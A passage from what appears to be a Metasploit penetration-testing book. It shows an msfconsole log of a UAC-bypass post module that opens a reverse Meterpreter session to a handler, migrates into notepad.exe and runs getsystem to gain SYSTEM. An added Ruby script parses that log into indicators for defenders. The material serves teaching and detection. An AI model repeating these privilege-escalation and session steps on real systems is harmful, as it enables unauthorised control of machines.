250
Chapter 16
[*] Meterpreter stager executable 73802 bytes long being uploaded..
[*] Uploaded the agent to the filesystem....
[*] Post module execution completed
msf post(bypassuac) >
[*] Sending stage (749056 bytes) to 172.16.32.130
[*] Meterpreter session 2 opened (172.16.32.128:4444 -> 172.16.32.130:1106) at Thu June 09 19:50:54 -0500 2011
[*] Session ID 2 (172.16.32.128:4444 -> 172.16.32.130:1106) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: tYNpQMP.exe (3716)
[*] Spawning a notepad.exe host process...
[*] Migrating into process ID 3812
[*] New server process: notepad.exe (3812)
msf post(bypassuac) > sessions -i 2
[*] Starting interaction with 2...
meterpreter > getsystem
...got system (via technique 1).
meterpreter >
We could also have executed run instead of use within the Meterpreter console; it would have leveraged the default options and executed without our having to set up the various options.
Notice in the preceding example that we succeeded in gaining system-level rights on a target machine with UAC enabled. This small example demonstrates how the post exploitation modules will ultimately be set up and converted. This script works simply by uploading a previously compiled executable to the target machine and then running it. Take a look at the post exploitation module for a better idea of what's going on behind the scenes:
root@bt:/opt/framework3/msf3# nano modules/post/windows/escalate/bypassuac.rb
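As an added example, not code from the book or from the Metasploit project, the following Ruby script parses the msfconsole transcript shown above (copied in as a constructed sample, with the wrapped lines rejoined) into the artifacts a defender could verify afterwards: the handler and victim socket pair, the dropped payload process, the process the session migrated into, the autorun script that did the migration, and whether SYSTEM was reached. The regular expressions and the event names are my own, keyed on the fixed wording Metasploit prints in the transcript.

```ruby
# Added example: summarize a Meterpreter transcript into host and network
# artifacts. Not code from the book or from Metasploit; the sample below
# is the transcript from the page with wrapped lines joined.

TRANSCRIPT = <<~LOG
  [*] Meterpreter stager executable 73802 bytes long being uploaded..
  [*] Uploaded the agent to the filesystem....
  [*] Post module execution completed
  msf post(bypassuac) >
  [*] Sending stage (749056 bytes) to 172.16.32.130
  [*] Meterpreter session 2 opened (172.16.32.128:4444 -> 172.16.32.130:1106) at Thu June 09 19:50:54 -0500 2011
  [*] Session ID 2 (172.16.32.128:4444 -> 172.16.32.130:1106) processing InitialAutoRunScript 'migrate -f'
  [*] Current server process: tYNpQMP.exe (3716)
  [*] Spawning a notepad.exe host process...
  [*] Migrating into process ID 3812
  [*] New server process: notepad.exe (3812)
  msf post(bypassuac) > sessions -i 2
  [*] Starting interaction with 2...
  meterpreter > getsystem
  ...got system (via technique 1).
  meterpreter >
LOG

# One pattern per event type, each paired with a lambda that turns the
# match into a hash. Patterns are keyed on the fixed wording msfconsole
# prints, so a line that matches none of them yields no event.
RULES = {
  stager_upload:  [/stager executable (\d+) bytes long being uploaded/,
                   ->(m) { { bytes: m[1].to_i } }],
  stage_sent:     [/Sending stage \((\d+) bytes\) to (\S+)/,
                   ->(m) { { bytes: m[1].to_i, target: m[2] } }],
  session_open:   [/Meterpreter session (\d+) opened \((\S+) -> (\S+)\)/,
                   ->(m) { { id: m[1].to_i, handler: m[2], target: m[3] } }],
  autorun:        [/processing InitialAutoRunScript '([^']+)'/,
                   ->(m) { { script: m[1] } }],
  server_process: [/(?:Current|New) server process: (\S+) \((\d+)\)/,
                   ->(m) { { name: m[1], pid: m[2].to_i } }],
  migrate:        [/Migrating into process ID (\d+)/,
                   ->(m) { { pid: m[1].to_i } }],
  got_system:     [/got system \(via technique (\d+)\)/,
                   ->(m) { { technique: m[1].to_i } }],
}.freeze

# Returns the transcript as an ordered array of [event_type, details] pairs.
def parse_events(text)
  text.each_line.flat_map do |line|
    RULES.filter_map do |type, (pattern, build)|
      m = pattern.match(line)
      [type, build.call(m)] if m
    end
  end
end

# Collapses the event stream into what an investigator can actually check:
# the C2 socket pair, the payload process that first hosted Meterpreter,
# the process it migrated into, and whether the session reached SYSTEM.
def summarize(events)
  procs = events.select { |t, _| t == :server_process }.map(&:last)
  sess  = events.find { |t, _| t == :session_open }&.last || {}
  {
    c2_handler:       sess[:handler],
    victim_socket:    sess[:target],
    payload_process:  procs.first,
    migrated_process: procs.last,
    autorun_script:   events.find { |t, _| t == :autorun }&.last&.dig(:script),
    reached_system:   events.any? { |t, _| t == :got_system },
  }
end

if __FILE__ == $PROGRAM_NAME
  summarize(parse_events(TRANSCRIPT)).each { |k, v| puts "#{k}: #{v.inspect}" }
end
```

Pointed at a saved msfconsole log after an engagement, the same parser gives the blue team a concrete checklist for their process-creation and network telemetry: the short-lived randomly named payload process, the session that ends up living inside notepad.exe with a different PID, and the outbound connection from the victim's port 1106 to the handler on port 4444.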
Wrapping Up
We won't cover all the details of the post exploitation module because it is nearly identical to the attack shown in Chapter 13. Carefully walk through each line, and then try to build and run your own module.

Walk through existing Meterpreter scripts and look at the different commands, calls, and functions that can be used to create your own script. If you come up with a great idea for a new script, submit it to the Metasploit development team—who knows; it might be a script that others can use!